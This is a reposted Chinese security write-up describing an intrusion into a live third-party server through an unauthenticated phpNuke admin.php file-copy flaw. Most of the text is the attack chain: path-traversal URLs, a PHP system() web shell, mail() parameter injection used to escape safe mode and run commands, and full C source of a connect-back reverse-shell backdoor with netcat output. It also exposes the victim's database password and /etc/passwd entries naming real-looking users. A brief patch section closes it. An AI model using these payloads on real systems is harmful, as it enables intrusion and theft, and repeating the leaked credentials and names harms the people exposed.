san是怎么利用phpnuke的漏洞做坏事的:) （转）

san是怎么利用phpnuke的漏洞做坏事的:)


原创：inburst（闯入）
来源：http://xfocus.org

san是怎么利用phpnuke的漏洞做坏事的:)

by inburst@xfocus.org
http://xfocus.org

[写在前面]由于大家对san<san@xfocus.org>这外表忠厚的同志一直不太了解，总是被其貌似老实
的样子所蒙蔽，本着对广大人民群众负责的态度，俺冒着被san敲诈晚饭之险，写下这篇文字，希
望大家能够通过俺的牺牲，揭开san的画皮啊:)

一、phpnuke的漏洞

2001-9-24日的bugtraq里，有一则短短的twlc security divison，说明了phpnuke所有版本(除了
5.0RC1)的admin.php文件中，存在一个文件上传的漏洞，因为没有对用户的身份进行验证，所以
任何一个用户都可以借此拷贝机器上的任意文件到phpnuke或者phpnuke以外的任意一个有权限的
目录。有问题的代码出在下面这段：

$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
 //^^^^^^
 //  +----------------->只是判断是否$upload=1，而没有做任何身份的验证
   copy($userfile,$basedir.$wdir.$userfile_name);
   $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
   // This need a rewrite -------------------------------------> OMG! WE
AGREEEEEEEE lmao
   //include("header.php");
   //GraphicAdmin($hlpfile);
   //html_header();
   //displaydir();
   $wdir2="/";
   chdir($basedir . $wdir2);
   //CloseTable();
   //include("footer.php");
   Header("Location: admin.php?op=FileManager");
   exit;
}

phpnuke是一个使用非常广泛的php程序，国内外有许多大的UNIXGNULinux站点都是使用这套程
序，而一般使用者都很少disable掉里面一些看起来非常强大，但实则容易出问题的函数。而且
phpnuke做出来的页面，风格非常明显，易于辨认，所以san就找了一个国外站点试了试……

二、简单利用

很直接的利用方法就是，用下面的语句将phpnuke的配置文件config.php拷贝到phpnuke目录下的
images/hacked.txt，如下：

http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userf
ile_name=hacked.txt

这样通过在浏览器上输入：

http://www.server.net/images/hacked.txt，就可以看到config.php的内容了，当然包括里面的
sql密码等敏感信息，比如下面就是该server的config.php片断：

-----------------snip--------------------------

######################################################################
# Database & System Config
#
# dbhost:   MySQL Database Hostname
# dbuname:  MySQL Username
# dbpass:   MySQL Password
# dbname:   MySQL Database Name
# system:   0 for Unix/Linux, 1 for Windows
######################################################################

$dbhost = "localhost";
$dbuname = "phpnuke";
$dbpass = "nukeitnow";
$dbname = "phpnuke_44";
$system = 0;

-----------------snip--------------------------

而且，通过这一漏洞，你甚至可以将文件复制到phpnuke以外的目录，比如(这是俺在自己机器上
测试的:)：

root@somehost:/tmp > ls -la
total 20
drwxrwxrwt   8 root     root         2048 Sep 25 13:37 .
drwxr-xr-x  19 root     root         2048 Feb 28  2001 ..
drwxrwxrwt   2 root     root         2048 Mar  6  2001 .X11-unix
-rw-r--r--   1 root     root          851 Sep 25 13:37 copyme.txt
....

在浏览器里输入以下url：

http://www.server.net/admin.php?
upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt
&userfile_name=/../../../../../../../tmp/hacked.txt

root@somehost:/tmp > ls -la
total 20
drwxrwxrwt   8 root     root         2048 Sep 25 13:37 .
drwxr-xr-x  19 root     root         2048 Feb 28  2001 ..
drwxrwxrwt   2 root     root         2048 Mar  6  2001 .X11-unix
-rw-r--r--   1 root     root          851 Sep 25 13:37 copyme.txt
-rwxr-xr-x   1 wwwrun   wwwrun        851 Sep 25 13:37 hacked.txt
....

hacked.txt已经被顺利地复制到/tmp下面了。

通常这时候是先试试看passwd吧……但是当san希望通过指定不同的文件名，来将/etc/passwd文
件拷贝到images目录下时，却发生了意外……：

输入如下url：

http://www.server.net/admin.php?
upload=1&file=/etc/passwd&file_name=hacked.txt&wdir=/images/&userfile=/etc/passwd&use
rfile_name=hacked.txt

浏览器里返回的结果有这么一句话：

Warning: SAFE MODE Restriction in effect. The script whose uid is 180 is not allowed
to access /etc/passwd owned by uid 0 in /home/htdocs/www-edu/admin.php on line 398

本来以为这样便将/etc/passwd文件复制到images/hacked.txt了，同样可以通过浏览器来看到
它，但结果却是不让拷，实在有些扫兴，但这也越发激起了san的斗志……xixi。

三、文件上传

1、脚本文件

但是只能浏览一些敏感信息，xundi姐姐觉得不太满意，提出要能执行命令的要求，于是san只好
再挖空心思……首先是写一个简单的php脚本，如果将它上载到服务器上，便可以利用该脚本执行
命令了：

------------test1.php------------
<?php
echo"  
";  
system("$cmd");  
echo"  
";  
?>
------------test1.php------------

2、上载文件至phpnuke目录下

当执行完比如
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userf
ile_name=hacked.txt

这样的命令后，phpnuke返回的是filemanager的界面，这时我们就可以简单地选择在选择本地的
文件后，选择upload把文件传到当前目录下(现在是images/下面)，就这样，san把test1.php传上
去了……

3、执行命令

在浏览器中输入http://www.server.net/images/test1.php?cmd=id，按照我们的构想，应该返回
web server运行者的id号，但结果……

居然返回空白？

4、safe mod

原来是这台web server使用了php的safe mod来运行，下面的例子是从php的安全模式说明文件中
摘出来的，比如我们希望在一台以safe mod运行的php web server上执行下面代码：

<?php
readfile('/etc/passwd');
?>  
 
结果浏览器会返回如下结果：

results in this error when Safe Mode is enabled: Warning: SAFE MODE Restriction in
effect. The script whose uid is 500 is not
allowed to access /etc/passwd owned by uid 0 in /docroot/script.php on line 2

这就是前面我们无法拷贝/etc/passwd的原因了，同样的，在安全模式下，system()调用等等也是
被禁止的，我们只能够执行safe_mode_exec_dir里允许的可执行文件，所以，我们的test1.php在
这里失去了用武之地……

四、突破限制

1、突破safe mod

先让我们看看san在他的一篇文章里写到的：

-------------------snip------------------------
2、mail函数的第五个参数
在php-4.0.5的时候，mail函数引入了第五个参数，用来设置在实际发送邮件的时候增加额外的命
令行参数，
但是没有很好的检查特殊SHELL命令字符，所以出现执行命令的大问题。就像手册里的例子：
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-
fwebmaster@$SERVERNAME");
这个是存在问题的，如果$SERVER_NAME=;mail san@xfocus.org < /etc/passwd就能把机器的密码
发送
到我的信箱了。
这里提醒一下，php手册里还有好几个例子存在安全问题的，大家实际使用的时候不要照搬，它只
是演示函数的
基本功能，理解了就可以了。
对于mail函数的这个问题，最简单的我们就不用这个第五个参数，要使用就过滤非法的字符如
(;)，还有就是修改
php源码包的程序ext/standard/mail.c，在if (extra_cmd != NULL) { 前增加如下一行：
extra_cmd=NULL
然后重新编译。
-------------------snip------------------------

通过这一原理，我们准备突破safe mod的限制了……先看看san写的test2.php

-----------------test2.php-------------------------
<?
mail("nobody@kk.com", "the subject", $message, "From:
webmaster@;cp /etc/passwd  /home/htdocs/www-edu/images/kk.txt", "-
fwebmaster@;cp /etc/passwd  /home/htdocs/www-edu/images/kk.txt");
?>
-----------------test2.php-------------------------

将test2.php上传到web服务器上并执行后，我们从浏览器中看
http://www.somesite.net/images/kk.txt，可以看到，我们已经可以拷贝/etc/passwd了，也就
是说，已经突破了safe mod的限制了……下面便是passwd的片断：

-----------------snip--------------------------
kzentner:x:13657:13657:Kerstin Zentner:/home/users/kzentner:/bin/bash
ipoertsc:x:13658:13658:Isabella Poertschacher:/home/users/ipoertsc:/bin/bash
bmarzi:x:13659:13659:Brigitte Marzi:/home/users/bmarzi:/bin/bash
a2kogler:x:13660:13660:Angelika Kogler:/home/users/a2kogler:/bin/bash
dtschisc:x:13662:13662:David Tschische:/home/users/dtschisc:/bin/bash
m2egger:x:13663:13663:Martina Egger:/home/users/m2egger:/bin/bash
ssimoner:x:13664:13664:Susanne Simoner:/home/users/ssimoner:/bin/bash
sberling:x:13665:13665:Silvia elisabeth Berlinger:/home/users/sberling:/bin/bash
-----------------snip--------------------------

好了，那我们就来给自己创建一个shell吧，先是上传了一个普通的bindshell.c(就是创建一个
socket而已)，然后再传一个test3.php文件对bindshell进行编译：

------------------test3.php-----------------------
<?
mail("nobody@kk.com", "the subject", $message, "From:
webmaster@;gcc /home/htdocs/www-edu/images/bindshell.c -o
bind", "webmaster@;gcc /home/htdocs/www-edu/images/bindshell.c -o bind");
?>
------------------test3.php-----------------------

test4.php文件用来运行这一绑定端口的程序bind，程序中定义了端口绑定于1234。

------------------test4.php-----------------------
<?
mail("nobody@kk.com", "the subject", $message, "From: webmaster@;/home/htdocs/www-
edu/images/bind", "webmaster@;/home/htdocs/www-edu/images/bind");
?>
------------------test4.php-----------------------

分别运行完test3.php和test4.php之后，我们在自己的机器上：

[san@redhat:/tmp]# nc www.somesite.net 1234
[san@redhat:/tmp]#

连接不上？想看看是否打开了端口，于是再上传一个test5.php看看netstat情况：

------------------test5.php-----------------------
<?
mail("nobody@kk.com", "the subject", $message, "From: webmaster@;netstat -na
>/home/htdocs/www-edu/images/netstat.txt", "webmaster@;netstat -na >/home/htdocs/www-
edu/images/netstat.txt");
?>
------------------test5.php-----------------------

运行了test5.php之后，我们察看http://www.server.net/images/netstat.txt，发现结果是：

netstat -na
/proc/net/tcp: Permission denied
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State

居然权限不够，实在恼火，用同样的方法察看ps -awx情况后，发现进程正常运行，因此san估计
可能是firewall将端口过滤了，所以决定……

2、突破firewall

从一大堆的代码里挑出这个connect-back的backdoor，代码很简单，如下：

/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
** <grazer@digit-labs.org> - (c) All rights reserved
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd <ip_of_listening_machine>
**
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

int fd, sock;
int port = 4000;
struct sockaddr_in addr;

char mesg[]  = "n[ Digit-Labs Connect-Back Backdoor ]n    
* Connected to Commandline...n";

char shell[] = "/bin/sh";

int main(int argc, char *argv[]) {

 while(argc < 2) {
   fprintf(stderr, "n %s <ip> nn", argv[0]);
   exit(0);
 }

 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);
 addr.sin_addr.s_addr = inet_addr(argv[1]);
 fd = socket(AF_INET, SOCK_STREAM, 0);
 connect(fd, (struct sockaddr*)&addr, sizeof(addr));

 send(fd, mesg, sizeof(mesg), 0);

 dup2(fd, 0);
 dup2(fd, 1);
 dup2(fd, 2);
 execl(shell, "in.telnetd", 0);

 close(fd);
 return 1;
}

用前面所述的方法，将back.c编译成back，在本地机器上起一个监听端口：

C:tempnc -l -vv -p 4000

然后再传上一个test6.php来运行back这个反向连接的程序(里面的*.*.*.*是san的IP地址)：

-------------------test6.php-----------------------
<?
mail("nobody@kk.com", "the subject", $message, "From: webmaster@;/home/htdocs/www-
edu/images/back *.*.*.*", "webmaster@;/home/htdocs/www-edu/images/back *.*.*.*");
?>
-------------------test6.php-----------------------

运行test6.php后，我们前面开启的nc端口终于收到对方服务器发来的数据包：

C:tempnc -l -vv -p 4000
listening on [any] 4000 ...
connect to [*.*.*.*] from www.server.net [*.*.*.*] 2259

[ Digit-Labs Connect-Back Backdoor ]
  * Connected to Commandline...
id <-------------我们的权限
uid=180(aphttpd) gid=180(aphttpd) gropus=180(aphttpd),11(tmp)
w  <-------------谁在系统里
10:43am up 24 days, 14:41, 0 users, load average: 0.10, 0.14, 0.11
USER    TTY    FROM    LOGIN@    IDLE    JCPU    PCPU    WHAT
pwd<-------------当前目录是什么
/home/htdocs/www-edu/images
ps awx│grep sendmail <----------看看这个让我们进入系统的后门进程吧 :)
1773 ?    S    0:00 sh -c /usr/sbin/sendmail -t -i webmaster@;/home/htdocs/www-
edu/images/back *.*.*.*

好了，到现在似乎这台服务器对san而言似乎已经失去更多的诱惑力了，毕竟已经上过了，xixi，
这就是san啊:)

五、结束语

1、简单修补

由此可见，这个phpnuke的漏洞算是相当严重的，这里就不老调重弹地重复那些web编程的注意要
点了，简单地修正这一漏洞，只需要把下面这句：

"if($upload) {"

改成：

"if (($upload) && ($admintest)) {"

就OK了，当然，如果你没有必要使用filemanager的话，把这一函数disable掉，或者不让启动
webserver的用户(通常是nobody或者www)有权限修改web路径下的文件吧。

2、如果利用某些开放源代码的程序的话，一要做代码审核，二要禁止掉一些危险的函数。

3、web server的权限设置要搞好。(在9-25日时，绿色兵团也一样存在这个漏洞，当然，它web
server设置得比较好，但也还是可以通过其它手段尝试绕过限制的)。

4、进行web攻击的时候，往往会遇到很多意外事件(比如这次遇到的safe mod)，这时要尝试不同
的方法和思路来突破……

六、参考资料

1、《twlc advisory: all versions of php nuke are vulnerable...》
2、《对PHP行攻击之狗尾续貂》by san@xfocus.org
3、PHP Manual: Safe Mode